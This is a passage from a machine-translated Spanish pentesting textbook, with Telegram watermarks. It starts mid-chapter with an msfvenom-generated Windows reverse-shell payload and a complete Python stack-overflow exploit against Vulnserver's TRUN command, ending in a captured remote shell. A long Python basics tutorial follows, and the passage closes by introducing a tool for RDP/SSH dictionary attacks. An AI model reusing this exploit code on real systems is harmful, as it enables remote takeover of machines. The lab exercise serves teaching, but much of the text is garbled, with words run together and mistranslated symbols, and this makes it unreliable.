172.16.0.103lport = 1111-AX86-B "\ X00" -fypython [-] noplatformwasselected, choosetmsf :: módulo :: plataforma :: windowsfromthepayload found11compatibledeloders intentandottoencodepayloadwith1iterationsofx86 / shikata_ga_nai x86 / shikata_ga_naisucceseedwithitsize351 (iteración=0) Canal de Telegram : @IRFaraExam Machine Translated by Google x86/shikata_ga_naichosenwithfinalsize351 Payloadsize:351bytesFinalsizeofpythonfile:1712bytes buf=b"" buf+=b"\xba\x1e\x11\x43\xb1\xdb\xda\xd9\x74\x24\xf4\x5e\x2b" buf+=b"\ xc9\xb1\x52\x31\x56\x12\x83\xee\xfc\x03\x48\x1f\xa1" buf+=b"\x44\x88\xf7\xa7\xa7\x70\x08\xc8\x2e\x95 \x39\xc8\x55" buf+=b"\xde\x6a\xf8\x1e\xb2\x86\x73\x72\x26\x1c\xf1\x5b\x49" buf+=b"\x95\xbc\xbd\x64 \x26\xec\xfe\xe7\xa4\xef\xd2\xc7\x95" […] En el comando anterior, usamos las siguientes opciones: ÿp (carga útil): Windowsreverseshell. LHOST :KaliIPaddress. LPORT : El número de puerto que usaremos en nuestro oyente. ÿa (arquitectura):x86. ÿb (carácter incorrecto): Queremos excluir el carácter incorrecto\x00 de la carga útil. Los caracteres incorrectos harán que el código de shell falle. ÿf (formato de salida): Python. Personajes malos Ahora sabe que un carácter incorrecto hará que la carga útil falle, pero hay más. Entonces, ¿por qué \x00 es un carácter incorrecto de todos modos? La razón principal es que el sistema operativo manejará un carácter incorrecto como un byte NULO. \x0D :Retorno del carro \xFF : avance de formulario \x0A : Salto de línea \x00 : NULO ShellcodePythonScript Después de generar el código shell usando MSFvenom, ahora podemos enviar una carga útil al servidor remoto. Además, tenga en cuenta que agregaremos algunas diapositivas NOP (32 de Canal de Telegram : @IRFaraExam Machine Translated by Google ellos) antes de agregar el código shell: importsocket importsys buf=b"" buf+=b"\xba\x1e\x11\x43\xb1\xdb\xda\xd9\x74\x24\xf4\x5e\x2b" buf+=b"\xc9\xb1\x52\x31 \x56\x12\x83\xee\xfc\x03\x48\x1f\xa1" buf+=b"\x44\x88\xf7\xa7\xa7\x70\x08\xc8\x2e\x95\x39\xc8\x55" buf+=b"\xde\x6a\xf8\x1e\xb2\x86\x73\x72\x26\x1c\xf1\x5b\x49" buf+=b"\x95\xbc\xbd\x64\x26\xec\xfe\ xe7\xa4\xef\xd2\xc7\x95" buf+=b"\x3f\x27\x06\xd1\x22\xca\x5a\x8a\x29\x79\x4a\xbf\x64" buf+=b"\x42\ xe1\xf3\x69\xc2\x16\x43\x8b\xe3\x89\xdf\xd2\x23" buf+=b"\x28\x33\x6f\x6a\x32\x50\x4a\x24\xc9\xa2\x20 \xb7\x1b" buf+=b"\xfb\xc9\x14\x62\x33\x38\x64\xa3\xf4\xa3\x13\xdd\x06" […] #addtothebuffersomeNOPslides(32isacommonnumber) shellcode="\x90"*32+buf #Payload=2003A's+addresstotheJMPESP+shellcodetoejecut payload="A"* 2003 + "\ xAF \ x11 \ x50 \ x62" + código de shell pruebe: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) conn=s.connect(('172.16.0.102',9999)) s.recv(1024) s.send('TRUN/.:/'+ payload) s.recv(1024) excepto: print("ErrorOccured") sys.exit(0) finalmente: s.close() Después de guardar el script de Python, realice los siguientes pasos: 1. En el host de Windows, asegúrese de que Vulnserver.exe se esté ejecutando. 2. No usaremos Immunity para este ejercicio; solo queremos un shell remoto. 3. En Kali, inicie Netcatlistener ( $ nc - nlvp1111 ). 4. Ejecute el script de Python, ¡y debería obtener un caparazón! root@kali:~#nc-nlvp1111 escuchando en [cualquier] 1111... conectarse a [172.16.0.103] desde (DESCONOCIDO) [172.16.0.102] 50339 Canal de Telegram : @IRFaraExam Machine Translated by Google MicrosoftWindows[Versión 10.0.19041.630] (c)2020MicrosoftCorporation.Todoslosderechosreservados. C:\Usuarios\Gus\Descargas\vulnserver-master\vulnserver-master>whoami whoami escritorio-0se33n2\gus Resumen En este capítulo, vio la forma común de explotar la pila, pero no es la única forma de hacerlo. Existen otras técnicas, como el controlador de excepciones estructurado (SEH) y Egghunter. En el siguiente capítulo, cubriremos los conceptos básicos del lenguaje de programación Python. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 17 Programando con Python Python es el lenguaje elegido por los piratas informáticos; es simple y convincente. Este fantástico lenguaje de programación proporciona una excelente plataforma de desarrollo para crear sus herramientas ofensivas. ¿Y adivina qué? Puede usarlo en cualquier plataforma, Windows, Mac o Linux. En este capítulo, aprenderá los siguientes conceptos en Python: CómoinstalaryusarPythondebuggeronKali Conceptos básicos de secuencias de comandos de Python Tipos de variables Cómodeclararunafunción Cómo manejar los bucles Condiciones de uso Cómo implementar la gestión de errores Cómo crear objetos de clase Conceptos básicos de Python Quizás se pregunte, ¿por qué elegir Python? Esta sección puede ayudarlo a tomar esa decisión. Hagamos algunas comparaciones primero. Cuando quiera comparar opciones, es mejor usar algún tipo de agrupación. Digamos que le gustan las hamburguesas, pero a su amigo John le gusta la pizza; Por ejemplo, si desea desarrollar una aplicación web empresarial, es mejor utilizar lenguajes de programación como C# o Java (y, a veces, PHP). Canal de Telegram : @IRFaraExam Machine Translated by Google Y si desea desarrollar controladores de hardware, debe profundizar en C ++ y el lenguaje ensamblador. Ahora viene la categoría de pruebas de penetración. En primer lugar, debe conocer Python y los conceptos básicos de Bashscripting (que ya cubrimos en el Capítulo 2, "Bash Scripting"). Ejecutar PythonScripts Para ejecutar una secuencia de comandos de Python , normalmente abre la ventana de su terminal y escribe la palabra clave python seguida del nombre de archivo/ruta de la secuencia de comandos de Python: raíz @ kali: ~ # python [python_file.py] Otra forma de ejecutar scripts de Python es utilizar el siguiente patrón: root@kali: ~#./[python_file.py] Aquí volvemos a suponer dos cosas, primero que está en el mismo directorio que el archivo de script (en la ventana de su terminal) y que le ha dado al archivo los permisos correctos usando el siguiente comando: raíz @ kali: ~ # chmod + x [python_file.py] La tercera mejor opción es simplemente escribir el nombre de archivo de Python: raíz @ kali: ~ # [python_file.py] Si desea ejecutar la secuencia de comandos de esa manera, deberá agregar el directorio (donde está guardando sus secuencias de comandos) a la variable PATH. Ya cubrimos esto en detalle en el Capítulo 2, donde cubrimos el lenguaje de secuencias de comandos Bash. Depuración de PythonScripts En un momento dado, desarrollará una secuencia de comandos grande con Python para ayudarlo a lograr sus objetivos de prueba de penetración. Cuando ese sea el caso, necesitará un software de entorno de desarrollo integrado (IDE) para que pueda depurar y detectar errores de programación. Usamos Visual Studio Code en Kali Linux en este capítulo y en el siguiente. Canal de Telegram : @IRFaraExam Machine Translated by Google Instalación de VSCodeonKali Es fantástico que los productos de Microsoft finalmente sean compatibles con Linux. En los viejos tiempos, esto era solo un sueño y era muy complicado ejecutar aplicaciones de Windows en un sistema operativo basado en Linux. Para descargar el archivo de instalación de VScode, use la siguiente URL: code.visualstudio.com/download. Una vez que se complete la descarga, abra su terminal y cambie su directorio actual a las carpetas Descargas (porque ahí es donde se encuentra la aplicación). En la ventana de la terminal, ejecute el siguiente comando (el nombre del archivo puede ser diferente en las versiones futuras de VSCode): root@kali:~/Downloads#dpkg-icode_1.51.1-1605051630_amd64.debSeleccionando código de paquete no seleccionado previamente. (Leyendo la base de datos… 345247 archivos y directorios actualmente instalados.) Preparando para desempaquetar código_1.51.1-1605051630_amd64.deb… Código de desempaquetado (1.51.1-1605051630)… Código de configuración (1.51.1-1605051630)… Processingtriggersfordesktop-file-utils(0.24-1)… Procesando disparadores de soporte de tiempo (3.64)… Processingtriggersforshared-mime-info(1.15-1)… Una vez finalizada la instalación, acceda al menú de Kali y escriba el nombre de la aplicación en el cuadro Buscar (consulte la Figura 17.1), y lo verá en los resultados de la búsqueda. Figura 17.1 Ejecutando VSCode Un último cambio que debe realizarse antes de comenzar a desarrollar secuencias de comandos de Python . ¡Debemos agregar la extensión de Python ! Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 17.2 Extensión de Python Finalmente, haga clic en el botón Instalar para instalar esta extensión. Cuando cree su primer script de Python, aparecerá un mensaje de VSCode en la parte inferior de la pantalla indicándole que instale Pylint (vea la Figura 17.3), y eso es lo único que queda para comenzar a usar este IDE para la programación de Python. Figura 17.3 Pylint PracticandoPython Tenga en cuenta que, en este capítulo, cubriremos la versión 3+ de Python. Desafortunadamente, la versión 2 ya no es compatible, pero aún puede usarla; no hay una gran diferencia en la sintaxis. Dicho esto, ¿qué sucede si desea practicar un escenario de Python rápidamente ? root@kali:~#python3 Python3.8.3(predeterminado, 14 de mayo de 2020, 11:03:12) [GCC9.3.0]enLinux Escriba"ayuda","derechos de autor","créditos"o"licencia"para obtener más información. >>> Canal de Telegram : @IRFaraExam Machine Translated by Google En esta etapa, puede probar rápidamente lo que quiera. Declaremos una variable de texto de cadena (llamada mensaje) e imprimámosla en la pantalla usando la función de impresión . Después de eso, usaremos el comando exit() para salir de la ventana del intérprete de Python: root@kali:~#python3 Python3.8.3(predeterminado, 14 de mayo de 2020, 11:03:12) [GCC9.3.0]enlinux Escriba"ayuda","derechos de autor","créditos"o"licencia"para obtener más información. >>>mensaje="¡Hola amigos!" >>>imprimir(mensaje) ¡Hola amigos! >>>salir() root@kali:~# NOTA Siempre guardamos las secuencias de comandos del código fuente de Python como archivos .py . PythonBasicSyntaxes Hay algunas sintaxis y patrones estándar en Python que debe tener en cuenta antes de continuar con este capítulo. Esta sección mostrará todas las formas populares de manejar el lenguaje Python; ¡comencemos! PythonShebang El Pythonshebang se logra agregando la ruta del intérprete de Python al host local (KaliLinux). La idea principal es ejecutar el archivo como un script y definir la versión del script también (Python 2 o 3). #!/usr/bin/python3 print("¡Hackeemos!") En la secuencia de comandos anterior, le indicamos al sistema operativo (KaliLinux) que utilice Python3. Además, si algún día compartimos este código con otras personas, también lo sabrán. Canal de Telegram : @IRFaraExam Machine Translated by Google sección. Comentarios en Python Para agregar comentarios en el script de Python, debe usar el signo de hash, . # Excepcionalmente, el shebang que usamos anteriormente no se trata como comentario, pero los hashes en el resto del script sí lo serán. Este es un ejemplo: #!/usr/bin/python3 #Imprimirunmensajeparaelusuario #[Todo]añadirmáslógicaposteriormente print("¡Hackeemos!") LineIndentationandImportingModules AnothercriticalconcepttounderstandinPythonishowtoindicatethatanew lineofsourcecodelogichasbeenstarted (youwillunderstanditwithexamples pronto) .Thisgenerallyhappensafteraconditionoraniteration (andmuchmore), whichwewillseelaterinthischapter.Inthefollowingexample, wewillusethe try / except statementtocatchanerrorifafiledidnotopenproperly (youwill seelaterinthischapterhowtheerrorhandlingworksinmoredetail) .Ifthis sucede, thenamessagewillindicatethatanerroroccurred.Noticethatwewill usetabsforlineindentationafterthe tratan syntaxandafterthe excepto sintaxis. El segundo concepto para comprender en esta sección es cómo importar otros módulos (a veces los llamamos bibliotecas) en Python. Los módulos son bibliotecas que usará dentro del script. Por ejemplo, cuando ocurre un error, desea que la aplicación salga. Para hacer el trabajo, puede usar la función sys.exit() . Pero para lograr su objetivo, primero debe importar el módulo sys en la parte superior de la secuencia de comandos utilizando la sintaxis de importación : #!/usr/bin/python3 importsys tratar: #Enestalíneautilicélapestañaparasangrado open_file=open("/usr/share/wordlists/nmap.lst") #usethetabheraswell print("¡El archivo se abrió con éxito!") excepto: #uselafichaaquí print("no se puede abrir el archivo") #yaquí Canal de Telegram : @IRFaraExam Machine Translated by Google salida del sistema (0) Entrada y salida En Python, puede ingresar datos en su secuencia de comandos mediante la ventana de terminal. Para que funcione, debe usar la sintaxis de entrada y almacenar su valor en una variable. Si desea usar use raw_input, la versión 2que de Python, siempre mantendrá el tipo de variable como una cadena. Para la parte de salida, la mayoría de las veces usará la función de impresión seguida del mensaje de texto que desea mostrar en la pantalla: #!/usr/bin/python3 ip_address=input(“Ingrese la dirección IP que desea escanear:“) print(“la dirección IP es:“ +dirección_ip) Impresión de argumentos CLI En el ejemplo anterior , usamos una forma interactiva de obtener alguna entrada del usuario. No siempre es así; puede leer los argumentos CLI mediante la función sys.argv . #!/usr/bin/python3 importsys print("Elnombredelaaplicaciónes:%s"%(sys.argv[0])) print("Elvalordelprimerargumentoes:%s"%(sys.argv[1])) La salida de este script (Isaveditas como temp.py ) cuando se ejecuta con el argumento H@K3R$ se verá así: root@kali:~/pythonLab#pythontemp.pyH@K3R$ El nombre de la aplicación es: temp.py El primer valor del argumento es: H@K3R$ Variables Las variables se utilizan en cualquier lenguaje de programación (no solo en Python) para almacenar datos temporales en la memoria. Canal de Telegram : @IRFaraExam Machine Translated by Google el código fuente. En Python tenemos múltiples tipos de variables, las más comunes son las siguientes: Numbers: Willstoredigits Strings: Willstoretext Listas: Willstoreanarraycoleccióndevalores Tuplas : Willstoreread-onlyarrayitems Diccionarios: Willstorepares clave-valor Números Digitnumberswillbestoredinthistypeofvariable.Let'sseeanexampleof howtousePythontostoreanumber.Inthefollowingexample, wewillcreatea variablethatwillholdtheportnumberthatwewanttoscanandthenprintthe valuetothescreen.Butbeforeprintingittothescreen, wewillusethe str functiontoconvertthenumbertoastring.Theplussignisusedtoappendthe stringstogether (theplusisnotusedasanadditionsymbol) .Inotherwords, que can'tappendastringtoaninteger; ithastobeconvertedfirsttoastringbefore printingittothescreen: port_number=80 print("Elnúmerodepuertoes" +str(número_puerto)) Abriremos Visual Studio Code y crearemos un nuevo archivo seleccionando el menú Archivo y haciendo clic en el elemento Nuevo archivo. A continuación, dentro del nuevo archivo, escribiremos el script de Python anterior. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 17.4 Depuración Si todo está bien (sin errores de escritura), entonces el terminal se encuentra en la parte inferior de la la pantalla debe mostrar los resultados que se muestran en la Figura 17.5. Figura 17.5 Salida ¡Felicitaciones! Esta es su primera secuencia de comandos oficial de Python utilizando un profesional AQUÍ. Operadores aritméticos En algunos escenarios, realizará operaciones aritméticas (suma, resta, etc.) en valores numéricos. Si ese es el caso, entonces tendrá que ser consciente de la lista de operadores que le permite realizar operaciones aritméticas, se muestra en la Tabla 17.1 . Tabla 17.1 Operadores aritméticos OPERADOR EJEMPLO DESCRIPCIÓN FIRMAR + ÿ num1+num2 Suma dos o más números num1ÿnum2 Resta dos o más números * num1*num2 Multiplica dos o más números / num1/num2 Divide dos o más números ** numero1** Calcula el valor exponencial de dos o más Canal de Telegram : @IRFaraExam Machine Translated by Google números numero2 % num1%num2 Calculaelresto(módulo)deladivisión resultado de dos o más números Instrumentos de cuerda En una variable de cadena, puede almacenar valores de texto. Puede almacenar texto en una variable de tres maneras: Conuna comilla única str1='10.0.0.1' Con comillas dobles str2="10.0.0.2" Con una comilla triple (para líneas múltiples) str3="""LadirecciónIPdeWindows el host que queremos escanear es 10.0.0.100""" Formato de cadena Para dar formato a una cadena de forma adecuada, necesita usar el operador de formato % . En el ejemplo de número, usamos el signo más para agregar un número entero a una frase (cadena). Pero la forma preferida de hacerlo es a través del operador de porcentaje como este: numero_de_puerto=80 print("Elnumerodepuertoes%d"%numero_de_puerto) El %d representa un entero decimal con signo. Hay muchos más símbolos de conversión que debe tener en cuenta al utilizar el formato de cadena (consulte la Tabla 17.2). Tabla 17.2 Formateadores de cadenas SÍMBOLO DESCRIPCIÓN %D Número decimal con signo %x o %X Número hexadecimal Canal de Telegram : @IRFaraExam Machine Translated by Google %e o %e Número exponencial %F número de coma flotante %C Personaje %s Cadena de texto Funciones de cadena En algunos escenarios, desearía ejecutar funciones en cadenas, por ejemplo, si desea conocer la longitud de una variable de cadena y mucho más. Hay muchas funciones de cadena, pero la tabla 17.3 enumera las más comunes (de hecho, hay muchas más que estas; En los ejemplos de la tabla 17.3, utilizaremos la siguiente variable de cadena: cadena = '10 .0.0.1 ' Tabla 17.3 Funciones de cadena FUNCIÓN DESCRIPCIÓN EJEMPLO len (cadena) Devuelve la longitud de un valor de cadena. >>> len (página) 8 reemplazar (valor antiguo, valor nuevo) Reemplaza un valor existente por otro. >>> split(delimiter) Divide un valor de texto de cadena en una matriz de subcadena usando un limitador (verá cómo manejar una matriz pronto). str.replace('.1','.0') '10.0.0.0' >>> cadena.dividir ('.') ['10', '0', '0', '1'] banda Elimina los caracteres iniciales >>> str.strip () '10.0.0.1' . Encontrar Encuentra todas las ocurrencias en una cadena. Si la búsqueda no tiene éxito, devuelve el índice de inicio; Contar >>>str.find('.1') 6 >>>str.cuenta('.') 3 Countshowmuchasvecesapareceunvalorenunacadena. Canal de Telegram : @IRFaraExam Machine Translated by Google Liza Una variable de lista es una colección de valores con diferentes tipos (cadena, enteros, etc.). Cada elemento de la lista tiene un número de índice y comienza en cero. En el siguiente ejemplo, estamos declarando una variable de lista para almacenar todos los números de puerto que queremos escanear: >>>lista_puertos=[21,22,80,443] >>>lista_puertos[0] 21 LecturaValoresenLista Para leer una sola lista de elementos, debe usar su número de índice, por ejemplo (basado en la variable anterior list_ports ): >>>lista_puertos[1] 22 Para leer una lista de varios elementos, debe seguir la fórmula [índice de inicio: índice hasta] y tener en cuenta que el índice hasta es exclusivo. Este es un ejemplo: >>>listar_puertos[0:3] [21,22,80] Actualización de elementos de lista Puede cambiar el contenido de una variable de lista. Para hacer el trabajo, solo necesita especificar el índice del valor que desea cambiar: >>>lista_puertos[0]='FTP' >>>lista_puertos ['FTP',22,80,443] Eliminación de un elemento de lista Para eliminar un elemento de lista, debe usar la palabra clave del y también identificar su índice. Para quitar el puerto 443 de la lista list_ports , debe ejecutar el siguiente comando: >>>dellist_ports[3] >>>list_ports ['FTP',22,80] Canal de Telegram : @IRFaraExam Machine Translated by Google tuplas Las tuplas son como listas, pero la diferencia principal es que las tuplas son de solo lectura y no se pueden cambiar. Cuando desee declarar una variable múltiple, debe usar paréntesis para encerrar los valores: >>>tuple_ports=(21,22,80,443) >>>tuple_ports[0] 21 Diccionario La variable adicional albergará una lista de pares de valores clave separados por dos puntos ( : ). El mejor ejemplo es visualizar cómo funciona este tipo utilizando el número de puerto ejemplo: >>>puertos_dic={'FTP':21,'HTTP':80} >>>puertos_dic['FTP'] 21 MásTécnicasenPython Acabamos de tocar la superficie de cómo manejar los conceptos básicos en Python. Cubriremos conceptos de programación más avanzados en las próximas secciones para construir sus programas con este fantástico lenguaje. Funciones Al igual que las variables, las funciones se crean para organizar el código y evitar redundancias, errores y malas prácticas de programación. El código se verá más legible y lógico cuando agreguemos funciones. deffunction_name(parámetros): #logicgoeshere return[valor/Ninguno] Con base en la estructura anterior, estas son las reglas para crear una función en Pitón: Canal de Telegram : @IRFaraExam Machine Translated by Google Antes del nombre de la función, debe agregar la palabra clave def (definición). Si su función tomará parámetros, debe agregarlos entre paréntesis después del nombre de la función. Antes de iniciar la función, debe agregar el carácter de dos puntos ( :) . El contenido de la función debe estar sangrado. Opcionalmente , puede agregar una declaración de devolución para informar que la función ha terminado de ejecutarse. Vamos a crear un ejemplo simple agregando una función que imprimirá cualquier mensaje que le enviaremos: defprint_text(valor_texto): imprimir(valor_texto) volver Valores devueltos En algunos casos, desea que su función devuelva algunos valores. Por ejemplo, desea devolver el nombre del servicio según el número de puerto: defget_serviceName(número_puerto): ports_services={21:'FTP',22:'SSH',80:'HTTP',443:'HTTPS'} returnports_services[número_puerto] imprimir (get_serviceName (21)) Argumentos opcionales También puede agregar argumentos opcionales dando el valor predeterminado si no se le ha pasado ningún valor. Usaremos el ejemplo anterior y haremos que el argumento del número de puerto sea opcional dándole un valor predeterminado de 80: defget_serviceName(número_puerto=80): puertos_servicios={21:'FTP',22:'SSH',80:'HTTP',443:'HTTPS'} returnports_services[port_number] #dado queportargisopcionalnovoyaatenerunvalorprint(get_serviceName()) Variables globales Las variables globales se ubican en el ámbito externo (p. ej., no en una función ni en un bucle, etc.) de una secuencia de comandos de Python y, por lo general, se definen al principio. Canal de Telegram : @IRFaraExam Machine Translated by Google para mostrar cómo funciona es a través de un ejemplo: #Estaesunavariableglobal default_portNumber=80 defprint_portNumber(): #Estaesunavariablelocalparalafunciónmisma default_portNumber=443 returndefault_portNumber print("Elvalorvariablelocal:%d"%print_portNumber()) print("Elvalorvariableglobal: %d"%default_portNumber) Ejecutar el script anterior dará el siguiente resultado: El valor de la variable local: 443 El valor de la variable global: 80 Cambio de variables globales ¿Qué sucede si desea cambiar la variable global desde dentro de una función? Si ese es el caso, entonces debe usar la sintaxis global: #Estaesunavariableglobal default_portNumber=80 defprint_portNumber(port_number): #Estaesunavariablelocalquepuedecambiarelvalordelavariableglobal globaldefault_portNumber default_portNumber=port_number returndefault_portNumber print("Elvalorvariablelocal:%d"%print_portNumber(443)) print("Elvalorvariableglobal: %d"%default_portNumber) Esta vez tenemos resultados diferentes a los ejemplos anteriores ya que cambiamos el valor de la variable global desde dentro de la función: El valor de la variable local: 443 El valor de la variable global: 443 Condiciones Las condiciones se cumplen a través de sentencias if ; comprobarán los resultados booleanos de una condición para evaluar la condición. Si el resultado devuelto es Verdadero , entonces , Canal de Telegram : @IRFaraExam Machine Translated by Google la condición se cumplirá, y la definición de Falso , la condición no se ejecutará. de ifit puede parecer elegante, pero el principio es sencillo cuando comienza a practicar. He aquí un ejemplo: deflogin(contraseña): if(contraseña=="MrRobot"): print("¡BienvenidoasociedadF!") secret=input("Ingrese su contraseña:") #llame a la función de inicio de sesión (secreto) Aquí se muestra cómo se ve en la ventana de salida: Ingrese su contraseña: MrRobot ¡Bienvenido a FSociety! if/ elseDeclaración En el ejemplo anterior, vio cómo iniciar sesión con una contraseña, pero ¿qué sucede si queremos mostrar otro mensaje cuando el usuario ingresa un no válido? En este caso, la declaración if / else hará el trabajo : deflogin(contraseña): if(contraseña=="MrRobot"): print("¡Bienvenido a la sociedad!") else: print("¡Hacker de contraseña incorrecta!") secreto = entrada ("Ingrese su contraseña:") inicio de sesión (secreto) El resultado será similar al siguiente si el usuario ingresa una contraseña incorrecta: Introduzca su contraseña: Gus WrongPasswordHacker! Operadores de comparación En el ejemplo de condición anterior, usamos el operador de comparación doble igual ( == ), pero hay muchos más que esto. La Tabla 17.4 enumera los operadores de comparación más comunes que deberá usar al aplicar una comparación declaración. Canal de Telegram : @IRFaraExam Machine Translated by Google Tabla 17.4 Operadores de comparación OPERADOR DESCRIPCIÓN EJEMPLO == Comprueba si el operando derecho y el operando >>>puerto_ftp== izquierdo son iguales puerto_http Falso Comprueba si el operando derecho no es igual al operando derecho >>>puerto_ftp!= Comprueba si el operando izquierdo es mayor que >>>puerto_ftp> el operando derecho puerto_http Falso Comprueba si el operando izquierdo es mayor >>>puerto_ftp>= 21 != > >= puerto_http Verdadero o igual que el operando derecho Cierto < <= Comprueba si el operando izquierdo es menor que el >>>puerto_ftp< operando derecho puerto_http Cierto Comprueba si el operando izquierdo es menor que >>> ftp_port <= el operando derecho 21 Cierto En los ejemplos de la tabla 17.4, estamos usando dos variables enteras: puerto_ftp=21 puerto_http=80 Iteraciones de bucle La sentencia de bucle iterará a través de líneas de código varias veces hasta que se cumplan las condiciones. Un buen ejemplo se basa en el anterior de la sentencia if ; whileLoop En este ejemplo, usaremos el ciclo while para permitir que el usuario ingrese la contraseña tres veces antes de que lo expulsemos del sistema: Canal de Telegram : @IRFaraExam Machine Translated by Google deflogin(contraseña): if(contraseña=="MrRobot"): print("¡Bienvenido a la sociedad!") else: print("¡Hacker de contraseña incorrecta!") intentos = 0 while (intentos <3): secreto = entrada ("Ingrese su contraseña:") inicio de sesión (secreto) intentos = intentos + 1 if(intentos==3): print("Se ha realizado el máximo de intentos, saliendo...") Aquí está la salida: Introduzca su contraseña: intento 1 ¡Hacker de contraseña incorrecta! Ingrese su contraseña: intent2 ¡Hacker de contraseña incorrecta! Ingrese su contraseña: intent3 ¡Hacker de contraseña incorrecta! Se ha realizado el máximo de intentos, saliendo... en bucle Podemos lograr el mismo objetivo de intento de contraseña usando un bucle for , que es más simple que el concepto de bucle while (prácticamente no uso el bucle while ; generalmente uso el bucle for en su lugar). deflogin(contraseña): if(contraseña=="MrRobot"): print("¡Bienvenido a la sociedad!") else: print("¡Hacker de contraseña incorrecta!") forattemptinrange(0,3): secret=input("Ingrese su contraseña:") login(secret) if(attempt==2): print("Se ha realizado el máximo de intentos, saliendo...") Se mostrará el mismo resultado que el ejemplo anterior. Tenga en cuenta que el rango (0,3) almacenará en la variable de intento esta secuencia 0, 1, 2 (y no 1, 2, 3) Canal de Telegram : @IRFaraExam Machine Translated by Google o 0,1,2,3). Por eso utilicé la condición if(attempt==2) para saber cuándo se maximizaron los intentos. Gestión de archivos Cuando se trata de administrar archivos en Python, tiene dos opciones: Abrir y leer (solo) un archivo Escribir en un archivo Abrir y leer un archivo en Python requerirá que use la función open y le dé dos parámetros: La ruta del archivo La letra r para indicar que estamos usando el modo de solo lectura En el siguiente ejemplo, abriremos un archivo adicional e imprimiremos las primeras 10 líneas elementos: #!/usr/bin/python3 importsys pruebe: open_file=open("/usr/share/wordlists/nmap.lst",'r') print("¡El archivo se abrió con éxito!") cuenta=0 forlineinopen_file: cuenta=cuenta+1 printline if(cuenta==100): break excepto: print("no se puede abrir el archivo") sys.exit(0) Para escribir en un archivo de Python, debe cambiar la letra r en la definición abierta y reemplazarla con la letra a (que significa agregar): #!/usr/bin/python3 defwrite_file(file_path,contenidos): prueba: open_file=open(file_path,'a') open_file.write(contenido) Canal de Telegram : @IRFaraExam Machine Translated by Google exceptoExceptionaserr: print("Error:%s"%str(err)) finalmente: volver #callthefunction write_file('/root/test.txt',"HackingTest\n") En el ejemplo anterior, debes prestar atención a dos conceptos esenciales (los conocerás en detalle en las siguientes secciones): Manejo de excepciones Caracteres de escape, como \n (nueva línea) Manejo de excepciones El manejo de excepciones/errores se asegurará de detectar un error cuando ocurra. Se debe usar el siguiente patrón cuando desee usar el manejo de errores: tratar: #Tucódigovaaquí excepto [ExceptionObjectType] como [variable]: #Aquí, usted maneja la excepción finalmente: #Addsomelogictoejecutealfinal Usamos el objeto de excepción ( Exceptionaserr ) en el ejemplo anterior ( función escribir_archivo). Aun así, hay muchos más tipos de objetos de excepción (tenga en cuenta que puede usar la palabra clave excepto sin la declaración de tipo de objeto de excepción, como lo hicimos en el ejemplo de abrir y leer archivo). Como probador de penetración, usará el tipo de objeto de excepción la mayor parte del tiempo. Caracteres de escape de texto En el ejemplo de escritura en archivo, usamos \n para agregar una nueva línea después de la inserción de un nuevo texto. Agregamos este carácter de escape para ver cómo manejar un caso similar. Tiene varias opciones de caracteres de escape que puede usar (consulte la Tabla 17.5). Tabla 17.5 Personajes de PythonEscape SÍMBOLO DESCRIPCIÓN \a Alerta Canal de Telegram : @IRFaraExam Machine Translated by Google \B Retroceso \Y Escapar \s Espacio \t Pestaña \norte Nueva línea \r Retorno del carro Objetos personalizados en Python Se crearon objetos o clases para organizar el código fuente en una forma aún más granular de lograr un desarrollo de código limpio. La declaración anterior es un poco filosófica; no se preocupe, comprenderá pronto qué clase (u objeto) es durante los próximos ejemplos. Los objetos de clase son útiles con programas grandes de código fuente. No cubriremos todas las técnicas de programación orientada a objetos en este capítulo porque no necesita un probador de penetración (es para programadores). Pero deberá tener en cuenta las siguientes terminologías: Miembros: estas son las variables públicas creadas dentro de una clase (por ejemplo, el miembro de texto creado en el siguiente ejemplo). Métodos: Estas son las funciones públicas creadas dentro de una clase (por ejemplo, el método print_red desarrollado en el siguiente ejemplo ). Constructor: esta es la función principal que se llama cuando se crea (instancia) el objeto de clase. Instanciar: esto es cuando el objeto de clase se declara fuera de su alcance (por ejemplo, el objeto de impresión creado en el siguiente ejemplo). Self: Esta es una palabra clave utilizada dentro de una tienda de clase presente en su instancia. Un ejemplo vale un trillón de palabras, empecemos por construir un objeto de clase de impresión para ver las cosas en la práctica. La siguiente clase tiene dos métodos (funciones): para imprimir un texto de color rojo y para imprimir un texto de color verde (imagine lo flexible que es esta clase; puede reutilizarla en cualquier programa que desarrolle): #!/usr/bin/python3 #Westartaclassherbyusingtheclasskeyword Canal de Telegram : @IRFaraExam Machine Translated by Google classPrintColor: #Variables de clase local red_color="\033[91m{}\033[00m" green_color="\033[92m{}\033[00m" #Classconstructorbyusingthe__init__function #self significa la propia clase; siempre debemos incluirlo como el primer parámetro def__init__(self,text): #Eltextoesunmiembrodeclase self.text=text #lasfuncionesqueestánexpuestassellamanmétodos #estafunciónpúblicaimprimirátextocolordefprint_red(self): print(self.red_color.format(self.text)) #estafunciónimprimirácolorverdetextodefprint_green(self): print(self.green_color.format(self.text)) #Aquí llamamos a la clase, la instanciamos creando un objeto aprnt prnt=PrintColor("Texto a imprimir") #Llamar al método de texto de impresión verde prnt.print_green() #Llamar al método de impresión de texto rojo prnt.print_red() Resumen Espero que haya disfrutado y practicado este capítulo. El pitonismo es mi elección para automatizar todos los escenarios de prueba de penetración. En el siguiente capítulo, verá cómo tomar lo que ha aprendido en este y aplicarlo para crear una herramienta de automatización. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 18 PentestAutomatizaciónconPython Amigos, ¡felicidades! Acaban de llegar al final de este libro. Rara vez la gente se compromete y se queda hasta el final. Este capítulo se centrará en cómo tomar una idea simple y luego implementarla en Python. Los inventores comienzan con una pequeña idea y, a partir de ahí, con voluntad (después de todos los fracasos), logran sus visiones. En este capítulo, explicaremos cómo tomar una idea de automatización y usarla como un probador de penetración. PenetraciónPruebaRobot La aplicación que usaremos en este capítulo se llama Penetration Test Robot ( pentest_robot.py ). Esta herramienta aprovechará los protocolos remotos en Windows y Linux OS. Para acceder a un sistema Windows, podemos usar RDP (puerto 3389) y para acceder a Linux OS de forma remota, podemos usar SSH (puerto 22). Esta herramienta pretende automatizar el proceso y escanear una sola I por rango y buscar estos dos servicios. Si están activos, la herramienta intentará automatizar un ataque de diccionario. AplicaciónFlujo de trabajo Los desarrolladores exitosos a menudo diseñan su aplicación antes de comenzar a codificar. Por lo general, utilizo Microsoft Visio para este fin. Como puede ver en la Figura 18.1 